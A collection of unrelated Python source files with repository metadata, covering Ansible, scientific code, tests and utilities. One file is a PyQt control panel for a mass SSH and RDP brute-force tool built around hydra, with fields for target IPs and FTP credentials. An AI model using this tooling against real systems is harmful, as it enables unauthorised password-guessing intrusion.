validate_certs = module.params['validate_certs']
login_user = module.params['login_user']
login_password = module.params['login_password']
login_token = module.params['login_token']
group_name = module.params['name']
group_path = module.params['path']
description = module.params['description']
state = module.params['state']
try:
git = gitlab.Gitlab(url=server_url, ssl_verify=validate_certs, email=login_user, password=login_password,
private_token=login_token, api_version=4)
git.auth()
except (gitlab.exceptions.GitlabAuthenticationError, gitlab.exceptions.GitlabGetError) as e:
module.fail_json(msg='Failed to connect to Gitlab server: %s' % to_native(e))
if group_path is None:
group_path = group_name.replace(" ", "_")
group = GitLabGroup(module, git)
group_exists = group.existsGroup(group_name)
if group_exists and state == "absent":
if group.deleteGroup():
module.exit_json(changed=True, result="Successfully deleted group %s" % group_name)
else:
if state == "absent":
module.exit_json(changed=False, result="Group deleted or does not exists")
else:
if group.createOrUpdateGroup(name=group_name, path=group_path, description=description):
module.exit_json(changed=True, result="Successfully created or updated the group %s" % group_name)
else:
module.exit_json(changed=False, result="No need to update the group %s" % group_name)
if __name__ == '__main__':
main()
|
gregdek/ansible
|
lib/ansible/modules/source_control/gitlab_group.py
|
Python
|
gpl-3.0
| 7,470 | 0.002544 |
import sys, psutil, subprocess, time
from PyQt4 import QtGui
global config
def kill(proc_pid):
try:
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
except Exception as e:
print "Can't kill process",proc_pid,e
def parseConfig():
global config
class Config(object):
pass
config = Config()
try:
with open("./config.py","r") as CR:
L = CR.readlines()
LL = filter(lambda x : x != "\n" and x[0] != "#", L)
LLL = map(lambda x : x.split("#")[0].split("\n")[0] , LL)
LLL = map(lambda x: x[:-1] if x[-1] == "\r" else x , LLL)
DL = dict([[l.split("=")[0],
("=".join(l.split("=")[1:])).split("\"")[1] if "\"" in ("=".join(l.split("=")[1:])) else ("=".join(l.split("=")[1:]))] for
l in LLL])
config.__dict__ = DL
except Exception as e:
print "[ERROR] Configurations parese incorrect"
return False
return True
class BruteGui(QtGui.QMainWindow):
def __init__(self):
super(BruteGui, self).__init__()
self.initUI()
self.id_server = "./id_server.exe"
self.id_process = None
def initUI(self):
#Layout
widget = QtGui.QWidget(self)
grid = QtGui.QGridLayout()
grid.setSpacing(10)
#Buttons
controlButtons = ["Load","Id","Start","Stop","Log"]
self.Buttons = []
for ib,cb in zip(range(len(controlButtons)),controlButtons):
self.Buttons.append(QtGui.QPushButton(cb))
self.Buttons[-1].clicked.connect(self.buttonPushed)
#if cb == "Log":
# self.Buttons[-1].setCheckable(True)
grid.addWidget(self.Buttons[-1],ib,3)
#Lines
inputLines = ["REFRESH:","ID IP:","HTTP IP:","FTP IP:","FTP USER:","FTP PASS:","FTP DIRECTORY:","SSH OPTS:","RDP OPTS:","MAX THREADS:"]
inputLinesV = ["control_updateTime", "ID_server", "server", "ftp_ip", "ftp_user", "ftp_pass",
"ftp_dir", "service_ssh", "service_rdp", "hydra_thread_limit"]
self.LableLines = []
for ib, cb, vcb in zip(range(len(inputLines)), inputLines, inputLinesV):
QLE = QtGui.QLineEdit()
QLE.setText(config.__dict__[vcb])
self.LableLines.append([vcb,(QtGui.QLabel(cb),QLE)])
grid.addWidget(self.LableLines[-1][1][0], ib,0)
grid.addWidget(self.LableLines[-1][1][1], ib,1)
self.LableLines = dict(self.LableLines)
widget.setLayout(grid)
self.setCentralWidget(widget)
self.statusBar()
self.setGeometry(500, 500, 500, 300)
self.setWindowTitle('Brute Massive Force : SSH+RDP ')
self.show()
def buttonPushed(self):
global config
sender = self.sender()
ts = sender.text()
#["Load", "Id", "Start", "Stop", "Log"]
if(ts == "Load"):
for l in self.LableLines:
config.__dict__[l] = str(self.LableLines[l][1].text())
with open("./config.py","w") as WF:
for c in config.__dict__:
WF.write(str(c) + "=\"" + config.__dict__[c] + "\"\n")
with open(config.server_control, "w") as WF:
WF.write("load")
elif(ts== "Id"):
if self.id_process != None:
kill(self.id_process.pid)
self.id_process = subprocess.Popen([self.id_server])
with open(config.server_control, "w") as WF:
WF.write("id")
elif(ts == "Start"):
with open(config.server_control, "w") as WF:
WF.write("start")
elif(ts == "Stop"):
with open(config.server_control, "w") as WF:
WF.write("stop")
elif (ts == "Log"):
with open(config.server_control, "w") as WF:
WF.write("log")
time.sleep(float(config.control_updateTime))
self.statusBar().showMessage(sender.text())
def closeEvent(self, event):
if self.id_process != None:
kill(self.id_process.pid)
def main():
parseConfig()
#t_id_server = threading.Thread(target=id_server)
app = QtGui.QApplication(sys.argv)
ex = BruteGui()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
satiros12/MassHydra
|
brute-gui.py
|
Python
|
mit
| 4,425 | 0.011299 |
class PublishService():
def __init__(self, providers, experiment):
self.rc_providers = providers
self.experiment = experiment
self.provider = self._get_provider()
def _get_provider(self):
from tardis.tardis_portal.publish.provider.rifcsprovider import RifCsProvider
if self.rc_providers:
from django.utils.importlib import import_module
for pmodule in self.rc_providers:
# Import the module
try:
module_name, klass_name = pmodule.rsplit('.', 1)
module = import_module(module_name)
except ImportError, e:
# TODO Show appropriate error msg
raise e
# Create the Instance
try:
provider_class = getattr(module, klass_name)
provider = provider_class()
except AttributeError, e:
# TODO Show appropriate error msg
raise e
# Retrieve the provider that can deal with the experiment
if provider and provider.is_schema_valid(self.experiment):
return provider
# Can't find a matching provider, return a default one
return RifCsProvider()
def get_context(self):
return self.provider.get_rifcs_context(self.experiment)
def manage_rifcs(self, oaipath):
if self.provider.can_publish(self.experiment):
self._write_rifcs_to_oai_dir(oaipath)
else:
self._remove_rifcs_from_oai_dir(oaipath)
def _remove_rifcs_from_oai_dir(self, oaipath):
import os
filename = os.path.join(oaipath, "MyTARDIS-%s.xml" % self.experiment.id)
if os.path.exists(filename):
os.remove(filename)
def _write_rifcs_to_oai_dir(self, oaipath):
from tardis.tardis_portal.xmlwriter import XMLWriter
xmlwriter = XMLWriter()
xmlwriter.write_template_to_dir(oaipath, "MyTARDIS-%s.xml" % self.experiment.id,
self.get_template(), self.get_context())
def get_template(self):
return self.provider.get_template(self.experiment)
|
steveandroulakis/mytardis
|
tardis/tardis_portal/publish/publishservice.py
|
Python
|
bsd-3-clause
| 2,367 | 0.008872 |
from nicepy.assertions import *
from nicepy.decorators import *
from nicepy.shortcuts import *
from nicepy.utils import *
|
katakumpo/nicepy
|
nicepy/__init__.py
|
Python
|
mit
| 122 | 0 |
from myfitnesspal.client import Client # noqa
__version__ = "1.16.6"
VERSION = tuple(int(v) for v in __version__.split("."))
|
coddingtonbear/python-myfitnesspal
|
myfitnesspal/__init__.py
|
Python
|
mit
| 128 | 0 |
# -*- coding: utf-8 -*-
# $Id: fi.py 7119 2011-09-02 13:00:23Z milde $
# Author: Asko Soukka <asko.soukka@iki.fi>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Finnish-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
'huomio': 'attention',
'varo': 'caution',
'code (translation required)': 'code',
'vaara': 'danger',
'virhe': 'error',
'vihje': 'hint',
't\u00e4rke\u00e4\u00e4': 'important',
'huomautus': 'note',
'neuvo': 'tip',
'varoitus': 'warning',
'kehotus': 'admonition',
'sivupalkki': 'sidebar',
'aihe': 'topic',
'rivi': 'line-block',
'tasalevyinen': 'parsed-literal',
'ohje': 'rubric',
'epigraafi': 'epigraph',
'kohokohdat': 'highlights',
'lainaus': 'pull-quote',
'taulukko': 'table',
'csv-taulukko': 'csv-table',
'list-table (translation required)': 'list-table',
'compound (translation required)': 'compound',
'container (translation required)': 'container',
#u'kysymykset': u'questions',
'meta': 'meta',
'math (translation required)': 'math',
#u'kuvakartta': u'imagemap',
'kuva': 'image',
'kaavio': 'figure',
'sis\u00e4llyt\u00e4': 'include',
'raaka': 'raw',
'korvaa': 'replace',
'unicode': 'unicode',
'p\u00e4iv\u00e4ys': 'date',
'luokka': 'class',
'rooli': 'role',
'default-role (translation required)': 'default-role',
'title (translation required)': 'title',
'sis\u00e4llys': 'contents',
'kappale': 'sectnum',
'header (translation required)': 'header',
'footer (translation required)': 'footer',
#u'alaviitteet': u'footnotes',
#u'viitaukset': u'citations',
'target-notes (translation required)': 'target-notes'}
"""Finnish name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
'lyhennys': 'abbreviation',
'akronyymi': 'acronym',
'kirjainsana': 'acronym',
'code (translation required)': 'code',
'hakemisto': 'index',
'luettelo': 'index',
'alaindeksi': 'subscript',
'indeksi': 'subscript',
'yl\u00e4indeksi': 'superscript',
'title-reference (translation required)': 'title-reference',
'title (translation required)': 'title-reference',
'pep-reference (translation required)': 'pep-reference',
'rfc-reference (translation required)': 'rfc-reference',
'korostus': 'emphasis',
'vahvistus': 'strong',
'tasalevyinen': 'literal',
'math (translation required)': 'math',
'named-reference (translation required)': 'named-reference',
'anonymous-reference (translation required)': 'anonymous-reference',
'footnote-reference (translation required)': 'footnote-reference',
'citation-reference (translation required)': 'citation-reference',
'substitution-reference (translation required)': 'substitution-reference',
'kohde': 'target',
'uri-reference (translation required)': 'uri-reference',
'raw (translation required)': 'raw',}
"""Mapping of Finnish role names to canonical role names for interpreted text.
"""
|
idea4bsd/idea4bsd
|
python/helpers/py3only/docutils/parsers/rst/languages/fi.py
|
Python
|
apache-2.0
| 3,541 | 0.001412 |
from .load_samples import load_sample_group_dsi, load_sample_group_fmri, load_sample_group_qball
import numpy as np
import bct
def test_nbs_dsi_qbi():
q = load_sample_group_qball()
d = load_sample_group_dsi()
_nbs_helper(q, d, .5, atol=0.3)
def test_nbs_paired_dsi_qbi():
pass
def test_nbs_dsi_fmri():
d = load_sample_group_dsi()
f = load_sample_group_fmri()
assert f.shape == (219, 219, 8)
_nbs_helper(d, f, .03, atol=0.03)
def test_nbs_paired_dsi_fmri():
pass
def _nbs_helper(x, y, expected_pval, atol=.05, thresh=.1, ntrials=25,
paired=False):
# comment
pval, _, _ = bct.nbs_bct(x, y, thresh, k=ntrials, paired=paired)
print(pval, expected_pval)
assert np.allclose(pval, expected_pval, atol=atol)
|
aestrivex/bctpy
|
test/nbs_test.py
|
Python
|
gpl-3.0
| 779 | 0.001284 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Execution example : python generate_zips.py "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"
#
# Libs
#
import csv, logging, os, sys, zipfile, zlib
#
# Config
#
log_folder = 'log'
log_level = logging.DEBUG
ignored_extensions = ['jp2', 'j2k', 'jpf', 'jpx', 'jpm', 'mj2']
ignored_files = ['.DS_Store']
#
# Functions
#
# A file is a classification plan file if its name is "planclassement.pdf"
def is_classification_file(file) :
return file == 'planclassement.pdf'
# A file is a transcription file if its name contains "_transcr_"
def is_transcr_file(file) :
return any(x in file for x in ['_transcr_', '_trans_'])
# A file is an inventory if its file name contains "_add_archives_inventaire"
def is_inventory_file(file) :
return '_add_archives_inventaire' in file
# A file is an "enquête sur l'enquête" file if it is into folder "add/ese" and its extension is ".mp3", ".xml" or ".pdf"
def is_ese_file(root, extension) :
return os.path.join('add', 'ese') in root and extension.lower() in ['mp3', 'xml', 'pdf']
# A file is a meta file if its name is "meta_documents.csv" or "meta_speakers.csv"
def is_meta_file(file) :
return file in ['meta_documents.csv', 'meta_speakers.csv']
def add_file_to_archive(zf, root, path, file) :
zf.write(os.path.join(root, file), os.path.join(root.replace(path, ''), file))
def zipdir(path, zf_ol, zf_dl) :
# zf_ol and zf_dl are zipfile handle
for root, dirs, files in os.walk(path) :
for file in files :
logging.info('Add file into archive folder : ' + os.path.join(root, file))
extension = file.split('.')[-1]
file_without_extension = file.split('.')[0]
# Ignore all the JPEG2000 files
if not extension in ignored_extensions and not file in ignored_files :
# Transcription file
if is_transcr_file(file) :
# Add ODT and PDF transcription files into "download" archive folder
if extension.lower() in ['odt', 'pdf'] :
add_file_to_archive(zf_dl, root, path, file)
# Add XML transcription files into "online" archive folder
elif extension.lower() in ['xml'] :
add_file_to_archive(zf_ol, root, path, file)
# If file is an inventory, classification or "enquête sur l'enquête", add it to "donwload" and "online" archive folder
elif is_inventory_file(file) or is_classification_file(file) or is_ese_file(root, extension) :
add_file_to_archive(zf_dl, root, path, file)
add_file_to_archive(zf_ol, root, path, file)
# If file is a meta file, add it to "online" archive folder
elif is_meta_file(file) :
add_file_to_archive(zf_ol, root, path, file)
# For other files, check into the inventory file
elif file_without_extension in recordsbyid.keys() :
if recordsbyid[file_without_extension][21] != '' :
add_file_to_archive(zf_dl, root, path, file)
if recordsbyid[file_without_extension][22] != '' :
add_file_to_archive(zf_ol, root, path, file)
# Else do nothing
else :
logging.info('#ignored : file not added into "online" archive folder neither into "download" archive folder : ' + file)
#
# Main
#
if __name__ == '__main__' :
if len(sys.argv) <= 3 :
print ''
print 'Arguments error'
print 'Correct usage : python ' + sys.argv[0] + ' "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"'
print 'The first argument is mandatory and is the path to the folder to zip'
print 'The second argument is mandatory and is the path to the CSV inventory file'
print 'The third argument is not mandatory and is the name of the survey, this is used to name the archive folders'
else :
# Check that log folder exists, else create it
if not os.path.exists(log_folder) :
os.makedirs(log_folder)
# Create the archive folders names
survey_name = sys.argv[3] if len(sys.argv) == 4 else 'survey'
zip_online_folder_name = survey_name + '-ol.zip'
zip_download_folder_name = survey_name + '-dl.zip'
# Create log file
# log_file = log_folder + path_separator + sys.argv[0].replace('.py', '.log')
log_file = os.path.join(log_folder, sys.argv[0].replace('.py', '.log'))
logging.basicConfig(filename = log_file, filemode = 'w', format = '%(asctime)s | %(levelname)s | %(message)s', datefmt = '%m/%d/%Y %I:%M:%S %p', level = log_level)
logging.info('Start')
# Parse inventory file
logging.info('Parse inventory file')
inventory_file = sys.argv[2]
recordsbyid = {}
with open(inventory_file, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for x in spamreader :
if len(x) == 23 :
recordsbyid[x[1]] = x
# Create archive folder
zf_ol = zipfile.ZipFile(zip_online_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
zf_dl = zipfile.ZipFile(zip_download_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
logging.info('Create archive folders')
# Add files into archive folder
zipdir(sys.argv[1], zf_ol, zf_dl)
logging.info('Online folder zipped into file : ' + zip_online_folder_name)
logging.info('Download folder zipped into file : ' + zip_download_folder_name)
print ''
print 'Online folder zipped into file : ' + zip_online_folder_name
print 'Download folder zipped into file : ' + zip_download_folder_name
zf_ol.close()
zf_dl.close()
|
CDSP/generate_zips
|
generate_zips.py
|
Python
|
gpl-3.0
| 5,314 | 0.026177 |
#!/usr/bin/env python2
#
##############################################################################
### NZBGET POST-PROCESSING SCRIPT ###
# Post-Process to CouchPotato, SickBeard, NzbDrone, Mylar, Gamez, HeadPhones.
#
# This script sends the download to your automated media management servers.
#
# NOTE: This script requires Python to be installed on your system.
##############################################################################
#
### OPTIONS ###
## General
# Auto Update nzbToMedia (0, 1).
#
# Set to 1 if you want nzbToMedia to automatically check for and update to the latest version
#auto_update=0
# Safe Mode protection of DestDir (0, 1).
#
# Enable/Disable a safety check to ensure we don't process all downloads in the default_downloadDirectory by mistake.
#safe_mode=1
## Gamez
# Gamez script category.
#
# category that gets called for post-processing with Gamez.
#gzCategory=games
# Gamez api key.
#gzapikey=
# Gamez host.
#
# The ipaddress for your Gamez server. e.g For the Same system use localhost or 127.0.0.1
#gzhost=localhost
# Gamez port.
#gzport=8085
# Gamez uses ssl (0, 1).
#
# Set to 1 if using ssl, else set to 0.
#gzssl=0
# Gamez library
#
# move downloaded games here.
#gzlibrary
# Gamez web_root
#
# set this if using a reverse proxy.
#gzweb_root=
# Gamez watch directory.
#
# set this to where your Gamez completed downloads are.
#gzwatch_dir=
## Posix
# Niceness for external tasks Extractor and Transcoder.
#
# Set the Niceness value for the nice command. These range from -20 (most favorable to the process) to 19 (least favorable to the process).
#niceness=10
# ionice scheduling class (0, 1, 2, 3).
#
# Set the ionice scheduling class. 0 for none, 1 for real time, 2 for best-effort, 3 for idle.
#ionice_class=2
# ionice scheduling class data.
#
# Set the ionice scheduling class data. This defines the class data, if the class accepts an argument. For real time and best-effort, 0-7 is valid data.
#ionice_classdata=4
## WakeOnLan
# use WOL (0, 1).
#
# set to 1 to send WOL broadcast to the mac and test the server (e.g. xbmc) on the host and port specified.
#wolwake=0
# WOL MAC
#
# enter the mac address of the system to be woken.
#wolmac=00:01:2e:2D:64:e1
# Set the Host and Port of a server to verify system has woken.
#wolhost=192.168.1.37
#wolport=80
### NZBGET POST-PROCESSING SCRIPT ###
##############################################################################
import sys
import nzbToMedia
section = "Gamez"
result = nzbToMedia.main(sys.argv, section)
sys.exit(result)
|
DxCx/nzbToMedia
|
nzbToGamez.py
|
Python
|
gpl-3.0
| 2,702 | 0.011843 |
from __future__ import division
import itertools as it
import numpy as np
import scipy.linalg as sl
import matplotlib.pyplot as plt
import csv
import sys
from zdict import zdict
# hbar^2/2m in eV-Ang^2
hb2m0 = 3.807
# hcR_infty (eV per Rydberg)
Ry = 13.60569253
def mag2(V):
""" Return the magnitude squared of a tuple, list, or array """
return sum([v**2 for v in V])
class EPM(object):
def __init__(self,m,a0,VS,VA,bands):
self.a0 = a0
self.bands = bands
# Range of Fourier modes
d = range(-m,1+m)
# Construct all G-vectors in reciprocal lattice basis
G = [np.array((-i+j+k,i-j+k,i+j-k)) for i in d for j in d for k in d]
# Restrict to vectors of squared magnitude 12 or less
self.G = [g for g in G if mag2(g) < 13]
# Number of G vectors
ng = len(self.G)
# Assemble potential part of Hamiltonian
self.H = np.zeros((ng,ng),dtype=complex)
# Loop over all pairs of G vectors
for ii in range(ng):
for jj in range(ii,ng):
# Difference between two G vectors
dg = self.G[jj]-self.G[ii]
dgmag2 = mag2(dg)
# Dot product of dg and tau
theta = np.pi*sum(dg)/4
c = np.cos(theta)
s = np.sin(theta)
self.H[ii,jj] = (VS[dgmag2]*c-1j*VA[dgmag2]*s)*Ry
self.H[jj,ii] = self.H[ii,jj].conj()
def solve(self,k):
# Incorporate kinetic (main diagonal) part of Hamiltonian
kpg2 = np.array([mag2(k-g) for g in self.G])
kinetic = hb2m0*kpg2*(2*np.pi/self.a0)**2
# Insert diagonal elements
np.fill_diagonal(self.H,kinetic)
# Calculate eigenvalues of a Hermitian matrix
E = sl.eigvalsh(self.H)[:self.bands]
return E
if __name__ == '__main__':
# Name of semiconductor, e.g. Si, GaAs, InP, ZnS...
material = sys.argv[1]
reader = csv.reader(open('form_factors.csv','r'),delimiter=',')
param = [[entry.split()[0] for entry in row] for row in reader]
# Store form factors in dictionaries
VS = zdict()
VA = zdict()
a0 = None
# Read form factors and lattice constant from file
row = [p[0] for p in param].index(material)
for i in range(1,len(param[0])):
exec(param[0][i] + '=' + param[row][i])
# Symmetry points in the FCC/Zincblende Brillouin zone
bz = {r'$\Gamma$':np.array((0,0,0)),
r'X':np.array((0,1,0)),
r'L':np.array((1/2,1/2,1/2)),
r'W':np.array((1/2,1,0)),
r'U':np.array((1/4,1,1/2)),
r'K':np.array((3/4,3/4,0))}
# Follow this path through the Brillouin zone to construct
# the band diagram
path = [r'L',r'$\Gamma$',r'X',r'W',r'K',r'$\Gamma$']
path_dex = range(len(path)-1)
# Highest Fourier mode to use
fmodes = 3
# Number of energy bands to compute
bands = 8
# Number of k-point along each path to evaluate
kpts = 40
# k-space path parametric variable
t = np.linspace(0,1,kpts)
# Construct solver object
epm = EPM(fmodes,a0,VS,VA,bands)
# Sequence of path directions in k-space
kdir = np.diff(np.vstack([bz[p] for p in path]),n=1,axis=0)
# Lengths of k-space path segments
path_length = [np.sqrt(mag2(k)) for k in kdir]
# Relative positions of k-space symmetry points along x axis
xticks = np.cumsum([0]+path_length)
x=np.hstack([xticks[i]*(1-t)+xticks[i+1]*t for i in path_dex])
# Parameterize path between two Brilluoin zone symmetry points
K = lambda d: (np.outer((1-t),bz[path[d]])+np.outer(t,bz[path[d+1]]))
# Compute eigenvalues along k-space path
E = np.vstack([np.vstack([epm.solve(k) for k in K(j)]) for j in path_dex])
Emin = np.min(E)-1
Emax = np.max(E)+1
# Display E-k diagram
fig = plt.figure(1,(10,6))
plt.plot(x,E,'r-',lw=2)
plt.xlim(x[0],x[-1])
plt.ylim(Emin,Emax)
plt.xticks(xticks,path,fontsize=20)
plt.ylabel('Energy (eV)',fontsize=20)
plt.title(material + ' bandstructure by EPM without S-O')
plt.vlines(xticks,Emin,Emax)
plt.show()
|
gregvw/EPM-FCC-bulk
|
epm.py
|
Python
|
mit
| 4,240 | 0.020755 |
"""
Copyright 2018-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import os
from mock import patch
from moto import mock_ssm
from nose.tools import assert_count_equal, assert_equal, assert_false, assert_true, raises
from aliyunsdkcore.acs_exception.exceptions import ServerException
from streamalert.apps._apps.aliyun import AliyunApp
from tests.unit.streamalert.apps.test_helpers import get_event, put_mock_params
from tests.unit.streamalert.shared.test_config import get_mock_lambda_context
@mock_ssm
class TestAliyunApp:
"""Test class for the AliyunApp"""
# pylint: disable=protected-access
@patch.dict(os.environ, {'AWS_DEFAULT_REGION': 'us-east-1'})
def setup(self):
"""Setup before each method"""
# pylint: disable=attribute-defined-outside-init
self._test_app_name = 'aliyun'
put_mock_params(self._test_app_name)
self._event = get_event(self._test_app_name)
self._context = get_mock_lambda_context(self._test_app_name, milliseconds=100000)
self._app = AliyunApp(self._event, self._context)
def test_sleep_seconds(self):
"""AliyunApp - Sleep Seconds"""
assert_equal(0, self._app._sleep_seconds())
def test_date_formatter(self):
"""AliyunApp - Date Formatter"""
assert_equal(self._app.date_formatter(), '%Y-%m-%dT%H:%M:%SZ')
def test_required_auth_info(self):
"""AliyunApp - Required Auth Info"""
assert_count_equal(list(self._app.required_auth_info().keys()),
{'access_key_id', 'access_key_secret', 'region_id'})
def test_region_validator_success(self):
"""AliyunApp - Region Validation, Success"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast-1'), 'ap-northeast-1')
def test_region_validator_failure(self):
"""AliyunApp - Region Validation, Failure"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast'), False)
@raises(ServerException)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
@patch('logging.Logger.exception')
def test_server_exception(self, log_mock, client_mock):
"""AliyunApp - Gather Logs, Exception"""
client_mock.side_effect = ServerException("error", "bad server response")
self._app._gather_logs()
log_mock.assert_called_with("%s error occurred", "Server")
def test_gather_logs_last_timestamp_set(self):
"""AliyunApp - Request Creation"""
assert_equal(self._app.request.get_StartTime(), '2018-07-23T15:42:11Z')
assert_equal(self._app.request.get_MaxResults(), AliyunApp._MAX_RESULTS)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_no_more_entries(self, client_mock):
"""AliyunApp - Gather Logs with no entries"""
client_mock.return_value = '{"RequestId":"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[],"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(0, len(logs))
assert_false(self._app._more_to_poll)
assert_equal("2018-07-23T19:28:00Z", self._app._last_timestamp)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_entries(self, client_mock):
"""AliyunApp - Gather Logs with some entries"""
client_mock.return_value = '{"NextToken":"20","RequestId":'\
'"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[{"eventTime":"123"},{"eventTime":"123"}],' \
'"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(2, len(logs))
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "20")
@patch('streamalert.apps.app_base.AppIntegration._invoke_successive_app')
@patch('streamalert.apps.batcher.Batcher._send_logs_to_lambda')
@patch('streamalert.apps._apps.aliyun.AliyunApp._sleep_seconds')
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_last_timestamp(self, client_mock, sleep_mock, batcher_mock, _):
"""AliyunApp - Test last_timestamp"""
# mock 3 responses
mock_resps = [
{
'NextToken': '50',
'RequestId': 'AAAAAAAA',
'Events': [
{
'eventTime': '2018-06-23T19:29:00Z'
},
{
'eventTime': '2018-06-23T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
},
{
'NextToken': '100',
'RequestId': 'BBBBBBBBB',
'Events': [
{
'eventTime': '2018-06-24T19:29:00Z'
},
{
'eventTime': '2018-06-24T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
},
{
'NextToken': '150',
'RequestId': 'CCCCCCCC',
'Events': [
{
'eventTime': '2018-06-25T19:29:00Z'
},
{
'eventTime': '2018-06-25T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
}
]
client_mock.side_effect = [json.dumps(r, separators=(',', ':')) for r in mock_resps]
# Mock remaining time. _sleep_seconds() methods will be called twice when
# make a call to gather logs via Aliyun API. Set sleep second to a large number
# to mimic corner case that there are still more logs to pull while lambda function
# timeout is reached. In this case, the _last_timestamp stamp should be updated
# correctly.
sleep_mock.side_effect = [0, 0, 0, 0, 1000000, 0]
# Mock 3 batcher call to invoke successive lambda function since there are more logs
batcher_mock.side_effect = [True, True, True]
self._app.gather()
assert_equal(self._app._poll_count, 3)
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "150")
assert_equal(self._app._last_timestamp, '2018-07-23T19:28:00Z')
|
airbnb/streamalert
|
tests/unit/streamalert/apps/test_apps/test_aliyun.py
|
Python
|
apache-2.0
| 7,474 | 0.002141 |
# GONZO: A PYTHON SCRIPT TO RECORD PHP ERRORS INTO MONGO
# Michael Vendivel - vendivel@gmail.com
import subprocess
import datetime
from pymongo import MongoClient
# where's the log file
filename = '/path/to/php/logs.log'
# set up mongo client
client = MongoClient('mongo.server.address', 27017)
# which DB
db = client.logs
# which Collection
php_logs = db.php_logs
# open a subprocess to tail (and follow) the log file
f = subprocess.Popen(['tail','-f',filename],\
stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# continue to read the file and record lines into mongo
while True:
# read line by line
line = f.stdout.readline()
# compose the document to be inserted
post = {"line": line,
"created": datetime.datetime.utcnow()
}
# insert the document into the Collection
post_id = php_logs.insert(post)
# output the line for visual debugging (optional)
print line
|
mven/gonzo.py
|
gonzo.py
|
Python
|
mit
| 888 | 0.023649 |
#!/usr/bin/env python
# coding: utf-8
"""
multiprocessTask.py
~~~~~~~~~~~~~~~~~~~
a multiprocess model of producer/consumer
task = Task(work_func, 1, 3, counter=0, a='', callback=cb)
results = task.run()
for i in xrange(26):
lines = ["%d" % i] * random.randint(10, 20)
task.put(lines)
task.finish()
"""
import os
import time
from multiprocessing import Pool as ProcessPool, Manager, cpu_count
__all__ = ['Producer', 'Consumer', 'Task']
class Callable(object):
def __call__(self, *args, **kwargs):
raise NotImplementedError('%s not callable' % self)
def run(self, *args, **kwargs):
raise NotImplementedError('%s.run() not implemented' % self)
class Producer(Callable):
def __init__(self, todo_list=None, max_qsize=None):
manager = Manager()
self._q = manager.Queue()
self._q_lock = manager.Lock()
self._q_close_event = manager.Event()
self._max_qsize = max_qsize or 0
todo_list = todo_list or []
if isinstance(todo_list, (list, tuple)) and len(todo_list) > 0:
self.put(todo_list)
super(Producer, self).__init__()
@property
def q_size(self):
return self._q.qsize()
def __call__(self, q, lock, close_event, *args, **kwargs):
for i, data in enumerate(self.run()):
with lock:
q.put(data)
print 'pid %s put %d: %s' % (os.getpid(), i, data)
def run(self):
while 1:
with self._q_lock:
if self._q.empty():
if self._q_close_event.is_set():
break
else:
time.sleep(0.01)
continue
yield self._q.get()
def put(self, *todos):
for todo in todos:
with self._q_lock:
self._q.put(todo)
def finish(self):
try:
self._q_close_event.set()
except Exception as e:
print e
class Consumer(Callable):
def __init__(self, fn=None):
self._fn = fn
self.results = []
super(Consumer, self).__init__()
def __call__(self, q, lock, close_event, *args, **kwargs):
while 1:
with lock:
if q.empty():
if close_event.is_set():
break
else:
time.sleep(0.01)
continue
data = q.get()
self.results.append(self.run(data, *args, **kwargs))
return self.results
def run(self, data, *args, **kwargs):
if self._fn:
return self._fn(data, *args, **kwargs)
class Task(object):
"""
a multiprocess model of producer/consumer
"""
def __init__(self, fn,
producer_count=None,
consumer_count=None,
callback=None,
batch=True,
counter=None,
**shared
):
"""
init producer/consumer task
Args:
fn: consumer called func(data, counter, q_size, *args, **shared_vars)
producer_count: producer process count, default: 1
consumer_count: consumer process count, default: cpu_count - 1
callback: callback func after f calling completed
batch: if True, `task.put(todo_list)` 'todo_list' will be do all at once in batches;
False, todo_list will be do one by one
counter: process shared counter, need custom imp in <fn>
**shared: process shared object data
"""
cpus = cpu_count()
if producer_count is None or producer_count < 1 or producer_count > cpu_count():
producer_count = 1
if consumer_count is None or consumer_count < 1 or consumer_count > cpu_count():
consumer_count = cpus - 1
